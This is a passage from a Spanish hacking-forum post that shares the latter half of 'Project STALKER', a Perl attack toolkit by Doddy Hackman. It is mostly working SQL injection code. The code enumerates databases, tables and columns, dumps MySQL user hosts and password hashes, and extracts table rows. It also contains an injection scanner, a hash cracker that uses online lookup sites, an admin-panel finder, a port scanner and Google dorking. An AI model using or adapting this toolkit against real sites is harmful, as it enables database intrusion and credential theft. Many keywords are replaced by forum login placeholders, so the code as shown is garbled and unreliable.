  555. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Database $real Found] $control\n";
  556. savefile($save.".txt","[Database $real Found] : $control");
  557. $real++;
  558. }
  559. }
  560. }
  561. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  562. } else {
  563. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[-] information_schema = ERROR\n";
  564. }
  565. }
  566.  
  567. sub schematablesdb {
  568. my $page = $_[0];
  569. my $db = $_[2];
  570. my $page1 = $page;
  571. savefile($_[3].".txt","\n");
  572. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Searching tables with DB $db\n\n";
  573. ($pass1,$pass2) = &bypass($_[1]);
  574. savefile($_[3].".txt","[DB] : $db");
  575. $page =~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  576. $page1=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  577. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
  578. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
  579. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
  580. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Tables Length :  $1\n\n";
  581. savefile($_[3].".txt","[+] Tables Length :  $1\n");
  582. my $limit = $1;
  583. $real = "1";
  584. for my $lim(0..$limit) {
  585. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
  586. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
  587. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  588. my $table = $1;
  589. No tienes permisos para ver links. Registrate o Entra con tu cuenta $table;
  590. savefile($_[3].".txt","[Table $real Found : $table ]");
  591. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Table $real Found : $table ]\n";
  592. $real++;
  593. }}
  594. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";    
  595. } else {
  596. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] information_schema = ERROR\n";
  597. }}
  598.  
  599. sub schemacolumnsdb {
  600. my ($page,$bypass,$db,$table,$save) = @_;
  601. my $page3 = $page;
  602. my $page4 = $page;
  603. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Searching columns in table $table with DB $db\n\n";
  604. savefile($save.".txt","\n");
  605. ($pass1,$pass2) = &bypass($_[1]);
  606. savefile($save.".txt","\n[DB] : $db");
  607. savefile($save.".txt","[Table] : $table");
  608. $page3=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  609. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
  610. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  611. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[Columns length : $1 ]\n\n";
  612. savefile($save.".txt","[Columns length : $1 ]\n");
  613. my $si = $1;
  614. No tienes permisos para ver links. Registrate o Entra con tu cuenta $si;
  615. $page4=~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
  616. $real = "1";
  617. for my $limit2(0..$si) {
  618. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
  619. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  620. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Column $real] : $1\n";
  621. savefile($save.".txt","[Column $real] : $1");
  622. $real++;
  623. }
  624. }
  625. } else {
  626. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] information_schema = ERROR\n";
  627. }
  628. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  629. }
  630.  
  631. sub mysqluser {
  632. my ($page,$bypass,$save) = @_;
  633. my $cop = $page;
  634. my $cop1 = $page;
  635. savefile($save.".txt","\n");
  636. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Finding mysql.users\n";
  637. ($pass1,$pass2) = &bypass($bypass);
  638. $page =~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
  639. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
  640. if ($code=~/RATSXPDOWN/ig){
  641. $cop1 =~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
  642. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
  643. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
  644. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[+] Users Found : $1\n\n";
  645. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
  646. for my $limit(0..$1) {
  647. $cop =~No tienes permisos para ver links. Registrate o Entra con tu cuenta/hackman/unhex(No tienes permisos para ver links. Registrate o Entra con tu cuenta(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
  648. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
  649. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
  650. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[Host] : $1 [User] : $2 [Password] : $3\n";
  651. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
  652. } else {
  653. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n";
  654. &reload;
  655. }
  656. }
  657. }
  658. } else {
  659. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n[-] mysql.user = ERROR\n\n";
  660. }
  661. }
  662.  
  663. sub No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  664. savefile($_[5].".txt","\n");
  665. my $page = $_[0];
  666. ($pass1,$pass2) = &bypass($_[4]);
  667. if ($page=~/(.*)hackman(.*)/){
  668. my $start = $1;
  669. my $end = $2;
  670. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Extracting values...\n\n";
  671. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  672. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  673. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  674. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  675. $tota = $1;
  676. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Table : $_[3]\n";
  677. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Length of the rows : $tota\n\n";
  678. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[$_[1]] [$_[2]]\n\n";
  679. savefile($_[5].".txt","[Table] : $_[3]");
  680. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  681. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  682. for my $limit(0..$tota) {
  683. No tienes permisos para ver links. Registrate o Entra con tu cuenta $limit;
  684. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  685. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  686. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  687. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[$_[1]] : $1   [$_[2]] : $2\n";
  688. } else {
  689. No tienes permisos para ver links. Registrate o Entra con tu cuenta "\n\n[+] Extracting Finish\n\n";
  690. &reload;
  691. }
  692. }
  693. } else {
  694. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[-] Not Found any DATA\n\n";
  695. }}}
  696.  
  697. sub bypass {
  698. if ($_[0] eq "/*") { No tienes permisos para ver links. Registrate o Entra con tu cuenta ("/**/","/*"); }
  699. elsif ($_[0] eq "%20") { No tienes permisos para ver links. Registrate o Entra con tu cuenta ("%20","%00"); }
  700. else {No tienes permisos para ver links. Registrate o Entra con tu cuenta ("+","--");}}
  701.  
  702. sub ascii {
  703. No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta ',',No tienes permisos para ver links. Registrate o Entra con tu cuenta "U*",$_[0];
  704. }
  705.  
  706. sub base {
  707. $re = encode_base64($_[0]);
  708. No tienes permisos para ver links. Registrate o Entra con tu cuenta $re;
  709. No tienes permisos para ver links. Registrate o Entra con tu cuenta $re;
  710. }
  711.  
  712. sub base_de {
  713. $re = decode_base64($_[0]);
  714. No tienes permisos para ver links. Registrate o Entra con tu cuenta $re;
  715. No tienes permisos para ver links. Registrate o Entra con tu cuenta $re;
  716. }
  717.  
  718.  
  719. sub download {
  720. if ($nave->mirror($_[0],$_[1])) {
  721. if (-f $_[1]) {
  722. No tienes permisos para ver links. Registrate o Entra con tu cuenta true;
  723. }}}
  724.  
  725.  
  726. sub hex_en {
  727. my $string = $_[0];
  728. $hex = '0x';
  729. for (No tienes permisos para ver links. Registrate o Entra con tu cuenta //,$string) {
  730. $hex .= No tienes permisos para ver links. Registrate o Entra con tu cuenta "%x", No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  731. }
  732. No tienes permisos para ver links. Registrate o Entra con tu cuenta $hex;
  733. }
  734.  
  735. sub hex_de {
  736. my $text = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  737. $text =~ s/^0x//;
  738. $encode = No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta[], No tienes permisos para ver links. Registrate o Entra con tu cuenta { No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta } $text =~ /../g;
  739. No tienes permisos para ver links. Registrate o Entra con tu cuenta $encode;
  740. }
  741.  
  742. sub ascii_de {
  743. my $text = No tienes permisos para ver links. Registrate o Entra con tu cuenta;
  744. $text = No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta[], No tienes permisos para ver links. Registrate o Entra con tu cuenta { No tienes permisos para ver links. Registrate o Entra con tu cuenta } No tienes permisos para ver links. Registrate o Entra con tu cuenta No tienes permisos para ver links. Registrate o Entra con tu cuenta[,],$text;
  745. No tienes permisos para ver links. Registrate o Entra con tu cuenta $text;
  746. }
  747.  
  748. sub getprocess {
  749.  
  750. my %procesos;
  751.  
  752. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
  753. my $dos = $uno->ConnectServer("","root\\cimv2");
  754.  
  755. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
  756. $procesos{$pro->{Caption}} = $pro->{ProcessId};
  757. }
  758. No tienes permisos para ver links. Registrate o Entra con tu cuenta %procesos;
  759. }
  760.  
  761. sub killprocess {
  762.  
  763. my ($numb,$pid) = @_;
  764.  
  765. if (Win32::Process::KillProcess($pid,$numb)) {
  766. No tienes permisos para ver links. Registrate o Entra con tu cuenta true;
  767. } else {
  768. No tienes permisos para ver links. Registrate o Entra con tu cuenta false;
  769. }
  770. }
  771.  
  772. sub getip {
  773. my $get = No tienes permisos para ver links. Registrate o Entra con tu cuenta($_[0]);
  774. No tienes permisos para ver links. Registrate o Entra con tu cuenta inet_ntoa($get);
  775. }
  776.  
  777. sub crackit {
  778.  
  779. my $secret = $_[0];
  780.  
  781. No tienes permisos para ver links. Registrate o Entra con tu cuenta "[+] Cracking $_[0]\n\n";
  782.  
  783. my %hash = (
  784.    
  785. 'http://passcracking.com/' => {
  786. 'tipo'  => 'post',
  787. 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}',
  788. 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
  789. },  
  790. 'http://md5.hashcracking.com/search.php?md5=' =>  {
  791. 'tipo' => 'get',
  792. 'regex' => 'Cleartext of $_[0] is (.*)',
  793. },
  794. 'http://www.bigtrapeze.com/md5/' =>  {
  795. 'tipo' => 'post',
  796. 'variables'=>'{"query" => $_[0], "submit" => " Crack "}',
  797. 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
  798. },
  799. 'http://opencrack.hashkiller.com/' =>  {
  800. 'tipo' => 'post',
  801. 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
  802. 'regex' => No tienes permisos para ver links. Registrate o Entra con tu cuenta(<\/div><div class="result">$_[0]:(.+)<br\/>),
  803. },
  804. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {
  805. 'tipo' => 'post',
  806. 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}',
  807. 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
  808. },
  809. 'http://victorov.su/md5/?md5e=&md5d=' =>  {
  810. 'tipo' => 'get',
  811. 'regex' => No tienes permisos para ver links. Registrate o Entra con tu cuenta(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
  812. }
  813. );
  814.  
  815. for my $data(keys %hash) {
  816.  
  817. if ($hash{$data}{tipo} eq "get") {
  818. $code = toma($data.$_[0]);
  819. if ($code=~/$hash{$data}{regex}/ig) {
  820. print "\n[+] Decoded : ".$1."\n\n";
  821. saveyes("logs/pass-found.txt",$secret.":".$1);
  822. }
  823. } else {
  824. $code = tomar($data,$hash{$data}{variables});
  825. if ($code=~/$hash{$data}{regex}/ig) {
  826. saveyes("logs/pass-found.txt",$secret.":".$1);
  827. }
  828. }
  829. }
  830. print "\n[+] Finish\n";
  831. }
  832.  
  833. sub ftp {
  834.  
  835. my ($ftp,$user,$pass) = @_;
  836.  
  837. if (my $socket = Net::FTP->new($ftp)) {
  838. if ($socket->login($user,$pass)) {
  839.  
  840. print "\n[+] Enter of the server FTP\n\n";
  841.  
  842. menu:
  843.  
  844. print "\n\nftp>";
  845. chomp (my $cmd = <stdin>);
  846. print "\n\n";
  847.  
  848. if ($cmd=~/help/) {
  849. print q(
  850.  
  851. help : show information
  852. cd : change directory <dir>
  853. dir : list a directory
  854. mdkdir : create a directory <dir>
  855. rmdir : delete a directory <dir>
  856. pwd : directory  
  857. del : delete a file <file>
  858. rename : change name of the a file <file1> <file2>
  859. size : size of the a file <file>
  860. put : upload a file <file>
  861. get : download a file <file>
  862. cdup : change dir <dir>
  863. exit : ??
  864.  
  865.  
  866. );
  867. }
  868.  
  869. if ($cmd=~/dir/ig) {
  870. if (my @files = $socket->dir()) {
  871. for(@files) {
  872. print "[+] ".$_."\n";
  873. }
  874. } else {
  875. print "\n\n[-] Error\n\n";
  876. }
  877. }
  878.  
  879. if ($cmd=~/pwd/ig) {
  880. print "[+] Path : ".$socket->pwd()."\n";
  881. }
  882.  
  883. if ($cmd=~/cd (.*)/ig) {
  884. if ($socket->cwd($1)) {
  885. print "[+] Directory changed\n";
  886. } else {
  887. print "\n\n[-] Error\n\n";
  888. }
  889. }
  890.  
  891. if ($cmd=~/cdup/ig) {
  892. if (my $dir = $socket->cdup()) {
  893. print "\n\n[+] Directory changed\n\n";
  894. } else {
  895. print "\n\n[-] Error\n\n";
  896. }
  897. }
  898.  
  899. if ($cmd=~/del (.*)/ig) {
  900. if ($socket->delete($1)) {
  901. print "[+] File deleted\n";
  902. } else {
  903. print "\n\n[-] Error\n\n";
  904. }
  905. }
  906.  
  907. if ($cmd=~/rename (.*) (.*)/ig) {
  908. if ($socket->rename($1,$2)) {
  909. print "[+] File Updated\n";
  910. } else {
  911. print "\n\n[-] Error\n\n";
  912. }
  913. }
  914.  
  915. if ($cmd=~/mkdir (.*)/ig) {
  916. if ($socket->mkdir($1)) {
  917. print "\n\n[+] Directory created\n";
  918. } else {
  919. print "\n\n[-] Error\n\n";
  920. }
  921. }
  922.  
  923. if ($cmd=~/rmdir (.*)/ig) {
  924. if ($socket->rmdir($1)) {
  925. print "\n\n[+] Directory deleted\n";
  926. } else {
  927. print "\n\n[-] Error\n\n";
  928. }
  929. }
  930.  
  931. if ($cmd=~/exit/ig) {
  932. next;
  933. }
  934.  
  935. if ($cmd=~/get (.*) (.*)/ig) {
  936. print "\n\n[+] Downloading file\n\n";
  937. if ($socket->get($1,$2)) {
  938. print "[+] Download completed";
  939. } else {
  940. print "\n\n[-] Error\n\n";
  941. }
  942. }
  943.  
  944. if ($cmd=~/put (.*) (.*)/ig) {
  945. print "\n\n[+] Uploading file\n\n";
  946. if ($socket->put($1,$2)) {
  947. print "[+] Upload completed";
  948. } else {
  949. print "\n\n[-] Error\n\n";
  950. }
  951. }
  952.  
  953. if ($cmd=~/quit/) {
  954. next;
  955. }
  956.  
  957. goto menu;
  958.  
  959. } else {
  960. print "\n[-] Failed the login\n\n";
  961. }
  962.  
  963. } else {
  964. print "\n\n[-] Error\n\n";
  965. }
  966.  
  967.  
  968.  
  969. }
  970.  
  971.  
  972. sub scanpaths {
  973.  
  974. my $urla = $_[0];
  975.  
  976. print "\n[+] Find paths in $urla\n\n\n";
  977. my @urls = repes(get_links(toma($urla)));
  978. for $url(@urls) {
  979. my $web = $url;
  980. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
  981. if ($_[0] =~/$auth/ or $auth eq "") {
  982. if ($path=~/(.*)\/(.*)\.(.*)$/) {
  983. my $borrar = $2.".".$3;
  984. if ($web=~/(.*)$borrar/) {
  985. my $co = $1;
  986. unless ($co=~/$auth/) {
  987. $co = $urla.$co;
  988. }
  989. $code = toma($co);
  990. if ($code=~/Index Of/ig) {
  991. print "[Link] : ".$co."\n";
  992. saveyes("logs/paths-found.txt",$co);
  993. }}}}}
  994. print "\n\n[+] Finish\n";
  995. }
  996.  
  997.  
  998. sub scanport {
  999.  
  1000. my %ports = ("21"=>"ftp",
  1001. "22"=>"ssh",
  1002. "25"=>"smtp",
  1003. "80"=>"http",
  1004. "110"=>"pop3",
  1005. "3306"=>"mysql"
  1006. );
  1007.  
  1008.  
  1009. print "[+] Scanning $_[0]\n\n\n";
  1010.  
  1011. for my $port(keys %ports) {
  1012.  
  1013. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
  1014. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
  1015. }
  1016. }
  1017. print "\n\n[+] Finish\n";
  1018. }
  1019.  
  1020.  
  1021. sub scanpanel {
  1022. print "[+] Scanning $_[0]\n\n\n";
  1023. for $path(@panels) {
  1024. $code = tomax($_[0]."/".$path);
  1025. if ($code->is_success) {
  1026. print "[Link] : ".$_[0]."/".$path."\n";
  1027. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
  1028. }
  1029. }
  1030. print "\n\n[+] Finish\n";
  1031. }
  1032.  
  1033. sub google {
  1034. my($a,$b) = @_;
  1035. for ($pages=10;$pages<=$b;$pages=$pages+10) {
  1036. $code = toma("http://www.google.com.ar/search?hl=&No tienes permisos para ver links. Registrate o Entra con tu cuenta=".$a."&start=$pages");
  1037. my @links = get_links($code);
  1038. for my $l(@links) {
  1039. if ($l =~/webcache.googleusercontent.com/) {
  1040. push(@url,$l);
  1041. }
  1042. }
  1043. }
  1044.  
  1045. for(@url) {
  1046. if ($_ =~/cache:(.*?):(.*?)\+/) {
  1047. push(@founds,$2);
  1048. }
  1049. }
  1050.  
  1051. my @founds = repes(@founds);
  1052.  
  1053. return @founds;
  1054. }
  1055.  
  1056.  
  1057. sub sql {
  1058.  
  1059. my ($pass1,$pass2) = ("+","--");
  1060. my $page = shift;
  1061. $code1 = toma($page."-1".$pass1."union".$pass1."No tienes permisos para ver links. Registrate o Entra con tu cuenta".$pass1."666".$pass2);
  1062. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  1063. print "[+] SQLI : $page\a\n";
  1064. saveyes("logs/sql-logs.txt",$page);
  1065. }}
  1066.  
  1067. sub get_links {
  1068.  
  1069. my $test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
  1070. return @links;
  1071.  
  1072. sub agarrar {
  1073. my ($a,%b) = @_;
  1074. push(@links,values %b);
  1075. }
  1076.  
  1077. }
  1078.  
  1079. sub repes {
  1080. foreach $test(@_) {
  1081. push @limpio,$test unless $repe{$test}++;
  1082. }
  1083. return @limpio;
  1084. }
  1085.  
  1086. sub head {
  1087. cprint "\x0311"; #13
  1088. print "\n\n-- == Project STALKER == --\n\n";
  1089. cprint "\x030";
  1090. }
  1091.  
  1092. sub copyright {
  1093. cprint "\x0311"; #13
  1094. print"\n\n(C) Doddy Hackman 2011\n\n";
  1095. cprint "\x030";
  1096. }
  1097.  
  1098. sub toma {
  1099. return $nave->get($_[0])->content;
  1100. }
  1101.  
  1102. sub tomax {
  1103. return $nave->get($_[0]);
  1104. }
  1105.  
  1106. sub tomar {
  1107. my ($web,$var) = @_;
  1108. return $nave->post($web,[%{$var}])->content;
  1109. }
  1110.  
  1111.  
  1112. sub conectar {
  1113.  
  1114. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
  1115. Proto => "tcp",Timeout  => 5);
  1116.  
  1117. print $sockex $_[2]."\r\n";
  1118. $sockex->read($re,5000);
  1119. $sockex->close;
  1120. return $re."\r\n";
  1121. }
  1122.  
  1123.  
  1124. sub enter {
  1125.  
  1126. my ($host,$user,$pass) = @_;
  1127.  
  1128. print "[+] Connecting to the server\n";
  1129.  
  1130. $info = "dbi:mysql::".$host.":3306";
  1131. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
  1132.  
  1133. print "\n[+] Enter in the database";
  1134.  
  1135. while(1) {
  1136. print "\n\n\n[+] Query : ";
  1137. chomp(my $ac = <stdin>);
  1138.  
  1139. if ($ac eq "No tienes permisos para ver links. Registrate o Entra con tu cuenta") {
  1140. $enter->disconnect;
  1141. print "\n\n[+] Closing connection\n\n";
  1142. last;
  1143. }
  1144.  
  1145. $re = $enter->prepare($ac);
  1146. $re->execute();
  1147. my $total = $re->rows();
  1148.  
  1149. my @columnas = @{$re->{NAME}};
  1150.  
  1151. if ($total eq "-1") {
  1152. print "\n\n[-] Query Error\n";
  1153. next;
  1154. } else {
  1155. print "\n\n[+] Result of the query\n";
  1156. if ($total eq 0) {
  1157. print "\n\n[+] Not rows returned\n\n";
  1158. } else {
  1159. print "\n\n[+] Rows returned : ".$total."\n\n\n";
  1160. for(@columnas) {
  1161. print $_."\t\t";
  1162. }
  1163. print "\n\n";
  1164. while (@row = $re->fetchrow_array) {
  1165. for(@row) {
  1166. print $_."\t\t";
  1167. }
  1168. print "\n";
  1169. }}}}
  1170. } else {
  1171. print "\n[-] Error connecting\n";
  1172. }}
  1173.  
  1174. sub saveyes {
  1175. open (SAVE,">>".$_[0]);
  1176. print SAVE $_[1]."\n";
  1177. close SAVE;
  1178. }
  1179.  
  1180. sub savefile {
  1181. open (SAVE,">>logs/webs/".$_[0]);
  1182. print SAVE $_[1]."\n";
  1183. close SAVE;
  1184. }
  1185.  
  1186. sub coleccionar {
  1187. opendir DIR,$_[0];
  1188. my @archivos = readdir DIR;
  1189. close DIR;
  1190. return @archivos;
  1191. }
  1192.  
  1193. sub helpme {
  1194.  
  1195. cprint "\x0310"; #13
  1196. print qq(
  1197.  
  1198. Commands :
  1199.  
  1200.  
  1201. getinfo
  1202. getip <host>
  1203. getlink <page>
  1204. getprocess
  1205. killprocess <name process> <pid process>
  1206. conec <host> <port> <command>  
  1207. allow <host>
  1208. paths <page>
  1209. encodehex <text>
  1210. decodehex <text>
  1211. encodeascii <text>
  1212. decodeascii <text>
  1213. encodebase <text>
  1214. decodebase <text>
  1215. scanport <host>
  1216. panel <page>
  1217. getpass <hash>
  1218. kobra <page>
  1219. ftp <host> <user> <pass>
  1220. mysql <host> <user> <pass>
  1221. navegator
  1222. scangoogle
  1223. help
  1224. exit
  1225.  
  1226. );
  1227. cprint "\x030";
  1228. }
  1229.  
  1230. #
  1231. #  The End ?
  1232. #
  1233.  

Eso es todo
« Última modificación: Marzo 14, 2015, 10:16:20 am por Expermicid »

 

¿Te gustó el post? COMPARTILO!



Tutorial perl desde cero By: Black Poision & Painboy

Iniciado por ProcessKill

Respuestas: 2
Vistas: 3164
Último mensaje Septiembre 02, 2011, 09:43:36 pm
por blozzter
[Perl] Verificando si es root para correr un script

Iniciado por c1st

Respuestas: 1
Vistas: 1477
Último mensaje Octubre 07, 2012, 06:01:39 pm
por ANTRAX
DoSing IP 1.0 - [Creado por SkillmaX] + Source [PERL]

Iniciado por SkillmaX

Respuestas: 0
Vistas: 1371
Último mensaje Julio 04, 2010, 10:14:31 am
por SkillmaX
[Perl] Iframe DDos Attack Tool

Iniciado por BigBear

Respuestas: 0
Vistas: 1275
Último mensaje Julio 03, 2011, 10:06:45 pm
por BigBear
[Perl] Half Life Servers List 0.1

Iniciado por BigBear

Respuestas: 0
Vistas: 1105
Último mensaje Noviembre 12, 2012, 07:31:50 pm
por BigBear